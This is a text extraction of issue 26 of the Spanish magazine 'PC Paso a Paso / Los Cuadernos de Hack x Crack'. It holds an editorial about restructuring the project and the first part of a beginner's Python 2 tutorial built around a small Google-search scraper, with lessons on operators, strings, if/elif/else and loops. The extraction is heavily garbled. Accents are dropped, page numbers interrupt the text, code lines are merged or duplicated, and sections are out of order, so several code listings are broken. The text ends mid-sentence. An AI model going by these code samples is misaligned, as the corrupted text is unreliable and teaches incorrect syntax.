aa aa a a a a a P A S Oaa a a a a a a a

EDITORIAL: C.I.F:
PERE MARTELL N 20, 2 - 1 43001 TARRAGONA (ESPAA)

P A S O

EDITOTRANS S.L. B43675701

Esta es, posiblemente, una de las editoriales ms importantes desde que fue iniciado el Proyecto Hack x Crack. Desde que esta revista sali al mercado, muchos han sido los problemas que han sido superados para estar cada mes en tus manos, pero esta vez ha sido toda una odisea. Por qu? La verdad, porque a veces las fuerzas faltan. Hasta ahora el trabajo ha recado sobre muy, muy, muy pocas personas, y llega un momento que es imposible abarcarlo todo como muy bien sabis nuestros lectores, hay temas muy abandonados (Web, Servidores de prcticas ). Hay muchas promesas no cumplidas, no hay tiempo real para cumplirlas y esto ha llegado a socavar los cimientos del proyecto. Hay una excepcin en esta escena que es el --Foro de Hack x Crack--, que gracias a sus administradores y moderadores, hoy es mucho ms que un foro. Ante la imposibilidad de seguir gestionando la revista de esta forma, el Proyecto Hack x Crack est cambiado sus cimientos se ha creado un ncleo de Gestin (formado por personas del Foro) que intentar, poco a poco, retomar los objetivos iniciales y gestionar muchos aspectos de la revista, desde la Web hasta el filtrado de textos que sern publicados. Esperamos que con la nueva lnea iniciada, este proyecto multiplique sus fuerzas y esto se vea reflejado en todas las reas. Para empezar hemos empezado a modificar la maquetacin, aspecto muy criticado por nuestros lectores. Pero esto es solo la punta del iceberg, necesitaramos un par de pginas para explicar los cambios que se han iniciado as que psate por el foro y podrs vivir en tiempo real estos cambios, esta nueva poca. Preprate para el prximo nmero y los siguientes, porque los cambios no dejarn de sucederse. El Proyecto HXC pasa a ser un proyecto abierto y el oxgeno necesario para crecer ya ha empezado a llegar gracias a la colaboracin desinteresada de personas que creen firmemente en HXC. Ahhh se nos olvidaba algo importantsimo: la revista pasa a ser BIMESTRAL. Esperamos que todos los cambios den su fruto y poder volver a salir mensualmente, pero no mataremos la semilla plantada ahogndola en abonos artificiales cuando PC PASO A PASO / Los Cuadernos de Hack x Crack vuelva a disfrutar de una tirada MENSUAL ser porque los cimientos del Proyecto finalmente se habrn asentado. Un abrazo a todos!!!

Director Editorial I. SENTIS E-mail contacto director@editotrans.com Ttulo de la publicacin Los Cuadernos de HACK X CRACK. Nombre Comercial de la publicacn PC PASO A PASO Web: www.hackxcrack.com Direccin: PERE MARTELL N 20, 2 - 1. 43001 TARRAGONA (ESPAA) IMPRIME: I.G. PRINTONE S.A. Tel 91 808 50 15 DISTRIBUCIN: SGEL, Avda. Valdeparra 29 (Pol. Ind.) 28018 ALCOBENDAS (MADRID) Tel 91 657 69 00 FAX 91 657 69 28 WEB: www.sgel.es

Quieres insertar publicidad en PC PASO A PASO? Tenemos la mejor relacin precio-difusin del mercado editorial en Espaa. Contacta con nosotros!!!

TELFONO DE ATENCIN AL CLIENTE: 977 22 45 80

Peticin de Nmeros atrasados y Suscripciones (Srta. Genoveva)

HORARIO DE ATENCIN:

DE 9:30 A 13:30 (LUNES A VIERNES)

Copyright Editotrans S.L. NUMERO 26 -- PRINTED IN SPAIN PERIOCIDAD MENSUAL Deposito legal: B.26805-2002 Cdigo EAN: 8414090202756

P ID E LO S NUMEROS ATRAS ADO S EN - - > WWW.HACKXCRAC K .C OM

Taller de Python "Episodio 1"

por Moleman (AKA Hctor Monlen) Bienvenidos a este taller de Python. En unos cuantos artculos espero ensearos a programar en este lenguaje que personalmente me apasiona, y espero que dentro de poco a vosotros tambin. No me enrollo ms y vamos al grano!!!
Si no lo tenis, podis descargaros las fuentes para compi lar (para Unix & Linux en general y para Mac OS X) de: http://www.python.org/ftp/python/2.4/Python-2.4.tgz Para sistemas Windows hay un setup aqu: http://www.python.org/ftp/python/2.4/python-2.4.msi Y aqu un instalador para Mac OS X (si no queris compi larlo): http://ftp.cwi.nl/jack/python/mac/MacPython-OSX-2.3-1.dmg (recomendado leerse antes la documentacin del instalador en http://homepages.cwi.nl/~jack/macpython/download.html )

Bien, el primer paso es descargarse el intrprete de Python si es que no lo tenis ya. Por si no lo sabis Python es un lenguaje interpretado, es decir, lo que se programa es un script que luego se le pasa al intrprete que lo ejecutar. Esto permite hacer rpidas modificaciones del programa al no tener que compilar cada vez, como ocurre por ejemplo con el lenguaje C. (Los que sepis algo de C notareis que la sintaxis se pare ce bastante. No es una coincidencia ) Los Linux-Users deberais tener el intrprete instalado por defecto. Podris comprobar si lo tenis simplemente ejecutando en una consola: Shadowland:~$ python Python 2.3.2 (#2, Oct 6 2003, 08:02:06) [GCC 3.3.2 20030908 (Debian prerelease)] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> El ">>>" es el prompt del intrprete esperando a que una orden sea introducida. Ms adelante veremos esto en ms detalle. Para salir simplemente pulsad Ctrl+D.

Existen en Python los siguientes operadores aritmticos (por orden de prioridad, de 1 a 4):

3/68

Taller de Python "Episodio 1"

Los operadores lgicos son, por orden de prioridad: >>> 5==5 True >>> 2*3+(4-3)/((4-5)**3) 5 >>> Espero que vayis comprendiendo como funciona. Los va lores True y False son valores que representan verdadero y falso respectivamente. En Python es lo ms parecido que hay a datos booleanos (esto debera ir en el punto de los tipos de datos, pero no tiene mayor complicacin). Existen ms tipos de operadores, pero supongo que es mejor ms adelante cuando salga una ocasin de usarlos, ya que su complejidad es bastante ms elevada, como por ejemplo los operadores >> y << que desplazan a la dere cha o izquierda los bits del valor que se les pasa tanto co mo se les indique.

Los operadores de comparacin tiene todos la misma prio ridad y son:

En Python, una variable se declara solamente cuando va a ser usada. No hay que declararlas al principio como en el tpico programa de C. As mismo, el tipo de dato que contendr la variable tam poco se declara y el intrprete lo toma dinmicamente segn el valor que se le pasa a la variable. La prioridad conjunta de todos ellos se define de mayor a menor, as: >>> a=5 >>> print a 5 >>> Como vemos, hemos asignado el valor entero 5 a la variable. Si hacemos: Hay que tener cuidado con las operaciones que aniden mu chos operadores de distintos tipos, ya que el orden de pre ferencia puede hacer que la operacin no salga como de biera. Para paliar el problema mientras cogis prctica, siempre podis usar los parntesis como separadores de operacin, verbi gratia: 2*3+(4-3)/((4-5)**3) Os pondr unos ejemplos de este tipo de operaciones: Shadowland:~$ python Python 2.3.4 (#2, Sep 24 2004, 08:39:09) [GCC 3.3.4 (Debian 1:3.3.4-12)] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> 2+3 5 >>> 4-2 2 >>> 5*2 10 >>> 2**3 8 >>> 4>5 False 4/68 >>> b=5.0 >>> print b 5.0 >>> Lo que estamos haciendo es asignar un valor flotante (de cimal) a la variable.(es importante notar que el decimal se representa con punto y no con coma) En ningn caso hemos declarado el tipo de dato que con tendr, aunque SI que hay que asignarle un valor antes de usar una variable o Python dar error. >>> print pruebaerror Traceback (most recent call last): File "<stdin>", line 1, in ? NameError: name 'pruebaerror' is not defined >>> Python es case sensitive por lo que diferencia entre maysculas y minsculas. Tambin hay que tener en cuen ta unas reglas para los nombres de las variables: 1. Slo se pueden usar dgitos, letras y el carcter de subrayado. El espacio no est permitido, as como ca racteres extraos.

1. 2. 3.

Aritmticos Comparacin Lgicos

Taller de Python "Episodio 1"

2. No pueden usarse las palabras reservadas de Python: and, assert, break, class, continue, def, del, elif, else, except, exec, finally, for, from, glo bal, if, import, in, is, lambda, not, or, pass, print, raise, return, try, while y yield. Veamos ahora algunos tipos de datos: El resultado es verdadero porque la H va antes que la J. Veamos otro ejemplo: >>> 'Hola'<'hola' True >>> Que ha pasado aqu? Por qu dice que es verdadero? Muy sencillo. Realmente Python compara basndose en el cdigo ASCII y la 'H' tiene un cdigo "inferior" a la 'h'. Por eso el resultado da True. Ms adelante le meteremos mano a tratamientos avanza dos sobre los datos, pero por el momento con esto nos basta.

En Python existen los enteros y los flotantes, como ya he mos visto. As mismo se pueden usar los valores booleanos True y False como ya comentamos antes. Existe tambin el tipo de datos cadena. A diferencia del C, donde las cadenas son vectores de caracteres, en Python hasta un nico carcter se considera una cadena. (internamente son vectores, pero a nosotros nos da igual por el momento. Por algo el Python es de alto nivel ) Un ejemplo: >>> mi_cadena='hola mundo' >>> print mi_cadena hola mundo >>> Como podemos ver, las cadenas se delimitan con comillas, da igual si son simples o dobles, aunque si se quieren mostrar cadenas en el texto, es conveniente delimitar la cadena con dobles y mostrar las simples: >>> mi_cadena="'hola mundo'" >>> print mi_cadena 'hola mundo' >>> Las cadenas son muy sufridas (ya lo veremos ms adelan te) y permiten muchos tipos de operaciones con ellas. A modo de abreboca, dos operaciones bsicas con cadenas son la concatenacin (con el signo + ) >>> 'abcd'+'efgh' 'abcdefgh' >>> que sera como una suma entre cadenas, y la repeticin (con el signo * ) >>> 'a'*10 'aaaaaaaaaa' >>> que repite la cadena tantas veces como se le indique. Tambin se pueden hacer comparaciones entre cadenas. Python las analiza "alfabticamente" para compararlas: >>> 'hola'<'jajeji' True >>>

Bien, vamos a escribir nuestro primer programa en Python. Hasta ahora hemos estado trasteando con el intrprete, pero ya es hora de ponernos serios. Que no os asuste, ya que este tema lo explicaremos en base al programa, y a algunas modificaciones que le iremos introduciendo, al tiempo que veremos en la prctica muchos conceptos del tema anterior. Adems este mismo programa nos servir para explicar temas de los artculos siguientes, como tra tamiento de cadenas y listas, sockets,... Bueno, primero hay que explicar que hace el programa, y luego iremos desglosando lnea a lnea segn vayamos viendo como funciona. Este programa bsicamente se conecta a Google para rea lizar la bsqueda que le pongas y te pasa el resultado de bidamente formateado y slo mostrando el nmero de re sultados que se le indique. Complicado? Puede, pero slo debido a que an no sabis que hace cada cosa. Tranquilos y tiempo al tiempo. Adems es un programa que podis usar sin problemas y es un ejemplo tan bueno como cualquier otro, y desde lue go mucho mejor que el tpico "hola mundo" que se suele hacer, verdad?

Los programas se pueden ejecutar en cualquier sistema, tanto Windows, como Linux. En Windows bastar con hacer doble click sobre l (podis crear el programa con el notepad o con el entorno idle del intrprete, o con cualquier editor que no formatee el texto como por ejemplo el Word del Office. Debis guardar el programa como .py . Os recomiendo el notepad), con un inconveniente: no veris el resultado porque cuando el programa termine, la ventana de shell se cerrar.

5/68

Taller de Python "Episodio 1"

Esto se soluciona ejecutando el programa desde una ven tana de comandos: 1. En Windows 9x, escribiendo: python programa.py 2. En Windows 2000 o XP, escribiendo simplemente: programa.py O bien aadiendo una pausa al final del programa si estis empeados en ejecutarlo con doble click, pero esto ya lo explicare ms adelante. Es decir, de momento usad la ven tana de comandos. En Linux, se puede ejecutar de dos formas: 1. Como en Windows, desde una shell escribiendo: python programa.py 2 . Po n i e n d o e n l a p r i m e r a l n e a d e l p r o g r a m a : #!/usr/bin/env python Esta lnea se encarga de buscar el intrprete en el siste ma y puede ejecutarse el script como si fuera un progra ma normal y corriente en consola, es decir: ./progra ma.py (tenis que darle permisos de ejecucin, que no se os ol vide) Bien, vamos a ejecutarlo a ver que pasa (yo usare en las pruebas, el primer mtodo en Linux, pero por nada en parti cular, aunque el segundo mtodo es mejor y recomendable): Shadowland:~/python$ ./google.py Busqueda: hackxcrack Numero de resultados: 5 http://www.<b>hackxcrack</b>.com/phpBB2/index.php http://dragonjar.nolimites.net/HTM/DragoN.php?subaction=showfull&amp; http://www.forohxc.com/Docs/Seguridad/ http://www.forohxc.com/Docs/Seguridad/ http://www.hackemate.com.ar/ezines/<b>hackxcrack</b>/ Shadowland:~/python$ CABECERA= ' <b>...</b> \n<br><font color=#008000>' FIN= ' ' NUM_RESULTADOS= 10 MAX_RESULTADOS= 50 def formateaQuery(query): from string import join a = query.split() return join(a, '+') def google(query=None, n=None): if n is None: n = NUM_RESULTADOS if query is None: print "No se ha efectuado bsqueda" return - 1 bsqueda = run (query,n) if bsqueda == -2: print 'Tu bsqueda para %s no ha arrojado resultados.' % (query.replace('+',' ')) return elif bsqueda == -1: print 'No se ha podido efectuar la conexin' return for x in bsqueda: print x def run(query,n): try: conn = httplib.HTTPConnection(URL) conn.request ("GET", COD_BUSQUEDA + formateaQuery(query)) r = conn.getresponse() except: print 'No se ha podido efectuar la conexin' return -1 if r.reason == 'OK': data = r.read() else: return -1 conn.close() aux = data.split(CABECERA) aux.pop(0) if len(aux) == 0: return -2 bsqueda = [] i=0 while n != 0 and i < MAX_RESULTADOS: try: a = aux[i].split(FIN,2)[0] if a != '': busqueda.append('http://'+a) n -= 1 except: pass i += 1 return bsqueda query=raw_input('Bsqueda: ') n=int(raw_input('Numero de resultados: ')) google(query,n)

Como podis ver, para ejecutarlo simplemente tenemos que teclear python y el nombre del programa. El programa nos pide que introduzcamos la bsqueda y luego el numero de resultados que queremos ver. Fcil, verdad? Y despus nos muestra los resultados de nuestra bsqueda. Enfermera! Guantes y bistur que vamos a proceder a la autopsia... paso por paso. Cdigo del programa: #!/usr/bin/env python import httplib URL= 'www.google.com' COD_BUSQUEDA= '/search?num=100&q=' 6/68

Taller de Python "Episodio 1"

ms exactos, la variable es de tipo cadena, porque raw_input() lee cualquier cosa que se le pase como una cadena de texto. Tambin podis observar la funcin int(). Esta funcin transforma en tipo entero el valor que se le pase. Es decir, si por ejemplo se le pasa una cadena de nmeros, lo transformara en un numero entero. En nuestro programa: n=int(raw_input()) lo que significa que (de dentro a fuera), primero se ejecuta el raw_input() con el que se obtiene una cadena y luego se transforma en un entero que se almacena en la variable n. Una forma ms clara seria: C o m o p o d e m o s o b s e r v a r, l l a m a m o s a l a f u n c i n raw_input() y almacenamos el resultado en una variable: query=raw_input() raw_input() permite el paso de parmetros en forma de cadena. Para los que conocen otros lenguajes, en especial C, sabrn que para mostrar un mensaje solicitando datos, primero se llama a la funcin de mostrar el mensaje y lue go se llama a la funcin que lee los datos. En C sera as: printf("Dame el dato:"); scanf("%c",&dato); Cuya traduccin directa al Python sera: print 'Dame el dato:' dato=raw_input() Pero (siempre hay un pero) esto no lo hace nadie. Es un desperdicio de la potencia de Python y de recursos del in trprete. La forma ms correcta de hacerlo sera: dato=raw_input('Dame el dato:') Como podis ver, raw_input() permite introducir el mensa je a mostrar por pantalla dentro de si mismo, lo cual acor ta y clarifica el cdigo, sin contar con que es mucho ms elegante. Adems posee la potencia de los lenguajes de alto nivel. Lee cualquier cantidad de datos, a diferencia de por ejem plo, el C, donde para leer una cadena habra que declarar un vector de caracteres y luego con un getchar() y un bu cle ir leyendo. Podris observar tambin que no declaramos que tipo de variable usamos para contener los datos recibidos de raw_input(). Python lo hace automticamente, y para ser n=raw_input() aux=int(n) n=aux Bien, ya sabemos como introducir datos. Ahora veremos como mostrar datos.

Lectura de datos desde el teclado

En Python, la funcin predefinida que se encarga de recibir datos del teclado es raw_input(). Esta funcin detiene la ejecucin del programa en espera de que el usuario introduzca datos por el teclado hasta re cibir un retorno de carro. Veamos nuestro programa de ejemplo: query=raw_input('Bsqueda: ') n=int(raw_input('Numero de resultados: '))

Mostrar datos por pantalla

Veamos otros trozos de nuestro programa: print 'No se efectuar la conexin' print 'No se ha podido ha podido efectuar la conexin' ..... ..... print x print x ..... ..... print 'Tu bsqueda para %s no ha arrojado resultados.' % (query.replace('+',' ')) print 'Tu bsqueda para %s no ha arrojado resultados.' % (query.replace('+',' ')) La funcin que muestra datos por pantalla, como ya ha bris deducido es print. Como veis, lo que se va a impri mir se debe introducir entre comillas, ya que es una cade na. Si no se hace as Python dar error. Y "x? No est entre comillas? No, porque x no es una cadena, sino una variable previa mente declarada y con un valor almacenado. Si a print le pasamos un parmetro sin comillas, lo interpreta como una variable y muestra el contenido de dicha variable por pantalla. De ah que si se escribe un texto sin poner las co millas de error. Python lo interpretara como una variable e intentar mostrar su valor por pantalla, pero como dicha variable no existir (a no ser que haya una coincidencia muy extraa), dar error: print hola Traceback (most recent call last): File "<stdin>", line 1, in ? NameError: name 'hola' is not defined Como veis Python se queja de que la variable "hola" no existe. Error nuestro ya que lo que queramos hacer era

7/68

Taller de Python "Episodio 1"

mostrar la cadena 'hola' por pantalla, pero no pusimos las comillas. print tambin permite el paso de varios parmetros as como operar con las cadenas dentro de l. Los parmetros van separados por comas. La coma hace que se consideren por separados y a efectos de impresin aparece como una pulsacin de la tecla espacio en pantalla. Como dijo alguien una vez, "se hace camino al andar..." Probemos el print: (usaremos de nuevo el intrprete ya que es ms rpido que editar un programa) >>> a=12 >>> b='hola que tal...' >>> print 'probando',a,'\n',b,'\n\n' probando 12 hola que tal... >>> Hemos creado dos variables, "a" y "b" y les hemos metido un entero y una cadena respectivamente. Despus hemos usado print para imprimir un mensaje, unos cuantos intros (la \n es el intro) y los contenidos de las variables. Sencillo, verdad? print tambin permite usar la concatenacin y la repeticin (teniendo en cuenta que son operaciones dispo nibles SLO para cadenas): >>> print 'probando otra vez'+b*5 probando otra vezhola que tal...hola que tal...hola que tal...hola que tal...hola que tal... >>> Hemos imprimido una cadena y luego una cadena conteni da en una variable repetida cinco veces, usando el "*". El "+" hace que se imprima junto. Si os fijis no aparece un espacio entre "vez" y "hola". Como ya dije antes, la coma de separacin imprime un espacio. Si quisiramos que usando la concatenacin (+) apareciera un espacio entre "vez" y hola" tendramos que ponerlo explcitamente den tro de la cadena, tal que as: "probando otra vez " (veis el espacio?) Pero fijaos que todo son cadenas, incluyendo lo que con tiene la variable. Si intentramos imprimir tambin la variable "a" de esta forma: >>> print 'probando otra vez'+a+b*5 Traceback (most recent call last): File "<stdin>", line 1, in ? TypeError: cannot concatenate 'str' and 'int' objects Pero ya tenemos ah otra vez el maldito espacio. Y si no lo queremos? Fcil, usaremos la funcin str() >>> print 'probando otra vez'+str(a)+b*5 probando otra vez12hola que tal...hola que tal...hola que tal...hola que tal...hola que tal... >>> Ya no salen espacios!!! str() convierte a cadena cualquier cosa que se le pase co mo parmetro (tened en cuenta y recordad de ahora en adelante que un parmetro puede ser tanto explcito, po niendo los datos a pelo, como variables, donde lo que se convierte es su contenido). En este caso, convierte el con tenido de "a" en una cadena, o sea, convierte el entero 12 en la cadena de texto '12'. Es como el inverso de la funcin int() que hemos mencionado antes. Slo nos queda explicar una ltima forma de usar la funcin print: las cadenas de formato. Las cadenas de formato son una forma de poder represen tar valores de variables dentro de una cadena sin tener que hacer uso de lo antes explicado, aunque todo es com plementario y podis usar lo que queris a la hora de im primir por pantalla. En nuestro programa:
print 'Tu bsqueda para %s no ha arrojado resultados.' % (query.replace('+',' ')) print 'Tu bsqueda para %s no ha arrojado resultados.' % (query.replace('+',' '))

Python nos avisa que no puede usarse la concatenacin con enteros y cadenas. La forma correcta sera: >>> print 'probando otra vez',a,b*5 probando otra vez 12 hola que tal...hola que tal...hola que tal...hola que tal...hola que tal... >>>

Un ejemplo simple de formato: >>> a=134 >>> b=12.5 >>> c='hola caracola' >>> print 'El valor de a es %d, el de b %f y el de c %s' %(a,b,c) El valor de a es 134, el de b 12.500000 y el de c hola caracola >>> Aqu podemos ver los tres tipos ms comunes (hay otros) de indicadores de cadenas de formato: %d, %f y %s. El primero sirve para enteros, el segundo para flotantes y el tercero para cadenas. Tenemos tres variables, una con un entero, otra con un flotante y la tercera con una cadena. Se meten los carac teres de formato dentro de la cadena a imprimir y luego se hace uso del operador % para imprimir por orden los

8/68

Taller de Python "Episodio 1"

parmetros que se le pasen, en este caso las tres variables (si slo se pasa un parmetro los parntesis son opciona les). En nuestro programa lo que le pasamos a la cadena de formato %s es la variable query formateada (como la for mateamos lo veremos en el siguiente articulo junto con muchas otras formas de tratamiento). Bueno, espero haberme explicado bien ya que ahora pasa remos al siguiente punto del tema: el control de flujo del programa. Veamos un ejemplo en nuestro programa: if r.reason == 'OK': data = r.read() else: Como podemos ver primero va el if seguido de la condicin a evaluar, en este caso si el contenido de "reason" es igual a la cadena 'OK' y finalizando con los dos puntos (aqu es cuando tenis que recordar todos los operadores que ex p l i c a m o s a l p r i n c i p i o d e l a r t i c u l o , e s d e c i r, l o s d e comparacin, lgicos y dems) Despus lo que hacemos es tabular las instrucciones que queremos que vayan dentro del if (en este caso slo una) y cuando finalicemos las tabulaciones el if habr finalizado. Bien, con lo que sabemos hasta ahora podramos hacer programas ms o menos complejos pero serian lineales, ejecutados de arriba a abajo, sin posibilidad de elegir que ejecutar y que no. Esto se solventa con las instrucciones de control de flujo, es decir, los condicionales y los bucles. Un apunte ms antes de meternos en materia. En Python las instrucciones se separan con intros, es decir, que a di ferencia de otros lenguajes de programacin, como por ejemplo el C que separa las instrucciones con punto y co ma y puedes llegar a escribir el programa en una sola lnea (cosas ms raras se ven), en Python es obligatorio separar las instrucciones con intros. Tambin hay otra obligacin que tiene que ver con los bucles y condiciones, y que aho ra veremos. Entremos en tema... Os pondr otro ejemplo ms simple y clarificador. Que pa sa si intentamos dividir entre cero? Que no tiene solucin, y si intentamos hacerlo en un lenguaje de programacin, el que sea, dar error. En python: Shadowland:~$ python Python 2.3.4 (#2, Sep 24 2004, 08:39:09) [GCC 3.3.4 (Debian 1:3.3.4-12)] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> 7/0 Traceback (most recent call last): File "<stdin>", line 1, in ? ZeroDivisionError: integer division or modulo by zero

if...elif...else
La estructura if permite introducir condiciones en la ejecucin del cdigo del programa. Su sintaxis es: if condicin: instruccin instruccin instruccin ... [continua el programa] Analicemos brevemente la teora. Como vemos la sintaxis es simple. Primero va el if con su condicin y finaliza con dos puntos (los dos puntos son importantes. Si no se po nen Python dar error). A continuacin vienen las instruc ciones que se ejecutaran SI la condicin es verdadera. En caso contrario no se ejecutaran. Y como sabemos que es lo que va dentro del if y lo que no? Fcil, es la otra "obligacin" del Python: las tabulaciones. Python reconoce las nuevas instrucciones mediante los in tros y adems usa las tabulaciones para diferenciar si es tas estn dentro o fuera de un bucle, una condicin, una funcin,....

Si intentamos dividir un numero entre cero da error. Bien, supongamos que tenemos este trozo de cdigo: a=int(raw_input('Dame un numero a dividir:')) b=int(raw_input('Dame el divisor:')) print a/b Sencillo, y si lo ejecutamos nos pide dos nmeros y divide el primero entre el segundo. Pero que pasara si el segun do numero fuera un cero. Que nos dara error como arriba. Como solucionarlo? Dicindole al python que si el segundo numero es un cero, que no ejecute la divisin, as: a=int(raw_input('Dame un numero a dividir:')) b=int(raw_input('Dame el divisor:')) if b!=0: print a/b As el programa slo ejecutara la divisin si el segundo nu mero es distinto (el operador != ) de cero. Fcil. Pasemos a la segunda parte del condicional: else El programa de divisin funciona pero no es muy eficaz y mucho menos elocuente. Si, evita la divisin entre cero pero no nos permite mostrar un mensaje diciendo que la divisin entre cero no esta permitida. Veamos por que:

9/68

Taller de Python "Episodio 1"

Si le aadimos a=int(raw_input('Dame un numero a dividir:')) b=int(raw_input('Dame el divisor:')) if b!=0: print a/b print 'La divisin por cero no esta permitida Aunque la divisin sea correcta y el if se ejecute porque el segundo numero no sea cero, el print del final se ejecutara igual. Esto se podra solucionar as: a=int(raw_input('Dame un numero a dividir:')) b=int(raw_input('Dame el divisor:')) if b!=0: print a/b if b==0: print 'La divisin por cero no esta permitida' Es correcto pero ni es elegante, ni eficiente. Python tiene que evaluar dos condiciones cuando no es necesario. Para eso existe el else: a=int(raw_input('Dame un numero a dividir:')) b=int(raw_input('Dame el divisor:')) if b!=0: print a/b else: print 'La divisin por cero no esta permitida' El else lo que hace es darle una segunda opcin, o mejor dicho una opcin por defecto, es decir, que si el if no es verdadero, se ejecuta el else. Si el if es verdadero el else no se ejecuta ni se procesa ni nada. consume menos re cursos, es ms bonito y elegante, etc, etc... Si lo traducimos a lenguaje humano bsicamente seria co mo si hiciramos: SI b DISTINTO_DE 0 HAZ: ...... SINO HAZ: .... La sintaxis del else es sencilla: if: .... else: instruccin instruccin .... [continua programa] Que nos queda? Que es ese elif que has puesto antes en el titulo del apartado? Tranquilos, que ahora voy a ello. Pero si es como un if!!!! Evala una condicin y si es ver dadera ejecuta el cdigo de dentro!!! FALSO! O s l o e x p l i c a r e c o n n u e s t r o p r o g ra m a d e d i v i s i n . Imaginemos que por una extrao y retorcido motivo de la fsica cuntica del universo (pedazo de frase sin sentido verdad? ), queremos que nuestro programa de divisin adems de impedir la divisin entre cero tambin impida la divisin cuando los dos nmeros son iguales (muy extrao pero es un ejemplo, as que no os quejis). Como lo haramos? Vamos a cambiar la estructuracin de la condicin pero es el mismo programa: a=int(raw_input('Dame un a dividir:')) a=int(raw_input('Dame un numero numero a dividir:')) b=int(raw_input('Dame el divisor:')) b=int(raw_input('Dame el divisor:')) if if b==0: b==0: print 'La divisin por esta no esta permitida' print 'La divisin por cero no cero permitida' else: else: if if a==b: a==b: print 'Los dos nmeros son iguales y no vamos dividirlos' a dividirlos' print 'Los dos nmeros son iguales y no vamos a else: else: print a/b print a/b Esto es lo que se conoce como if anidados, pero es horrible a la vista aunque no os lo creis. El cdigo funciona y se lee ms o menos bien pero es porque hay pocas condicio nes anidadas unas dentro de otras, pero ahora imaginaos 50 if unos dentro de otros. Tendiendo en cuenta que hay que tabular ms cada vez que se crea un nuevo if al final no se podra leer de la lnea tan larga que saldra slo a base de tabulaciones. Solucin: elif Sintaxis de elif: if condicin: ... elif condicin: .... elif condicin: .... else: ... Pueden ponerse tantos elif como se necesiten. elif equivale a las instrucciones else if unidas en uno. Veamos ahora el pro grama de la divisin hecho con elif: Veamos nuestro programa google.py: if bsqueda if bsqueda == -2: == -2: print 'Tu bsquedabsqueda para %s noarrojado resultados.' (query.replace('+',' ')) print 'Tu para %s no ha ha arrojado resultados.' % % (query.replace('+',' ')) return return elif bsqueda == -1: elif bsqueda == -1: print 'No se print 'No se ha podido efectuar la conexin' ha podido efectuar la conexin' return return

10/68

Taller de Python "Episodio 1"

a=int(raw_input('Dame un numero a dividir:')) b=int(raw_input('Dame el divisor:')) if b==0: print 'La divisin por cero no esta permitida' elif a==b: print 'Los dos nmeros son iguales y no vamos a dividirlos' else: print a/b Bastante ms legible y claro. El else con el if dentro de el se ha transformado en un elif y nos ahorramos tabulacio nes y ganamos en claridad de cdigo y en optimizacin. Un apunte extra: elif nos facilita enormemente la creacin de mens de seleccin. Os lo dejo como ejercicio, que si no os malacostumbrais Pasemos a la siguiente estructura de control: el bucle #contador.py i=0 while i<10: print i i=i+1 Shadowland:~/python$ python contador.py 0 1 2 3 4 5 6 7 8 9 Shadowland:~/python$ El programa crea una variable i con valor igual a cero y luego entra en el while el cual se ejecuta siempre que i sea menor que 10. Dentro del while hay un print que nos muestra el valor de i por pantalla y una instruccin i=i+1 que lo que hace es sumar 1 a la variable (incrementa la variable).

while
Como podemos hacer que una parte de nuestro cdigo se ejecute continuamente hasta que nosotros queramos? Usando un bucle, y eso es lo que es el while. Su sintaxis es: while condicin: instruccin instruccin ...... [continua programa] Veamos un ejemplo en nuestro programa google.py: while n != 0 and i < MAX_RESULTADOS: try: a = aux[i].split(FIN,2)[0] if a != '': busqueda.append('http://'+a) n -= 1 except: pass i += 1 Vale es un poco complejo al principio pero no demasiado. Paso por paso. Cuando python llega al while evala la condicin y si es cierta ejecuta todo lo del bucle y vuelve al while para vol ver a evaluar y seguir haciendo hasta que la condicin sea falsa. En este caso la condicin es que la variable n sea distinta de cero (n!=0) Y (and) que la variable i sea m e n o r q u e l a va r i a b l e M A X _ R E S U LTA D O S (i<MAX_RESULTADOS). Mientras sea verdadero, el while se ejecutara una y otra vez. Un ejemplo ms simple: un contador. Si creamos este programa y lo ejecutamos:

NOTA
el i=i+1 se puede sustituir (y se hace de normal) por i+=1 (podis verlo en el trozo de google.py). Esta contraccin tambin funciona con multiplicaciones, divisiones, restas,.... siempre y cuando la variable origen y la destino sean la misma (en este caso si, porque la variable i se usa como parte de la suma y al mismo tiempo como lugar donde almacenar el nuevo resultado).
Por que metemos el incremento? Porque si no aumentamos el valor de i, al valer en un principio cero, el while siempre seria verdadero y tendramos un bucle infinito (es decir, la pantalla inundada de nmeros sin parar nunca ) As como esta el programa podemos ver como la variable i se va incrementando uno a uno gracias al print y ver que finaliza cuando llega a 9 (si recordis while i<10). Cuando i llega a valer 10 el while ya no es verdadero y finaliza, y como no hay nada ms despus, finaliza el programa. Sencillo? Espero que si, y que lo vayis comprendiendo to do, ya que al final del articulo os pondr un ejercicio y es pero que posteis en el foro todas vuestras dudas y si os animis, el resultado del ejercicio y que problemas os ha dado Bueno, bueno, que esto se acaba. Nos quedan dos estruc turas ms y un ultimo punto y finalizamos. Creo que no se ha hecho muy largo, no? Y sin ms prembulos, la estructura

11/68

Taller de Python "Episodio 1"

for ... in ...
El problema del bucle while es que siempre tiene que tener un incremento o algo que haga que la condicin sea falsa para poder pararlo cuando nos interese, y aunque en mu chas ocasiones lo usaremos, en otras no es tan recomen dable. Para esas ocasiones existe el bucle for-in (PARA CADA elemento EN conjunto HACER). El bucle for-in es autoincremental, es decir que no hace falta ponerle un incremento como al while (lo que tambin tiene sus pros y sus contras, pero eso se ve con la prctica y la prueba-error), y su sintaxis es: for variable in serie: instruccin instruccin .... [continua programa] Veamos el ejemplo en nuestro google.py: for x in bsqueda: print x Simple y claro. Para cada valor de la variable x en el con j u n t o b s q u e d a i m p r i m e e n p a n t a l l a e l va l o r d e x . Nuevamente observamos que en python las variables no tienen que ser declaradas hasta que vayan a usarse. En google.py la lista "bsqueda" existe ya y se ha formateado y se han hecho operaciones con ella, pero la variable x no existe y se crea exclusivamente para ser usada por el for, ya que el for-in necesita una variable que sea la que se "incrementa", y aqu es la "x" Otro ejemplo en un programa simple. Vamos a cambiar nuestro antiguo contador hecho con un while por un conta dor hecho con un for-in: #contador2.py for i in range(0,10): print i Ejecutmoslo: Shadowland:~/python$ python contador2.py 0 1 2 3 4 5 6 7 8 9 Shadowland:~/python$ primer valor, y tampoco aparece el incremento de i porque el for-in la autoincrementa. Y que es ese range(0,10) que ha puesto ah? Existe una funcin que se usa mucho en un for-in cuando tratas con rango de nmeros: es la funcin range(). range() lo que hace es crear un "conjunto" de valores con los nmeros que haya entre un valor inicial y un valor final menos uno. Es decir, que si ponemos range(0,10) estamos creando un conjunto con los valores 0 al 9 (el 10 no se usa porque el ultimo valor no lo coge. Recordad: valor final menos uno), que es lo que 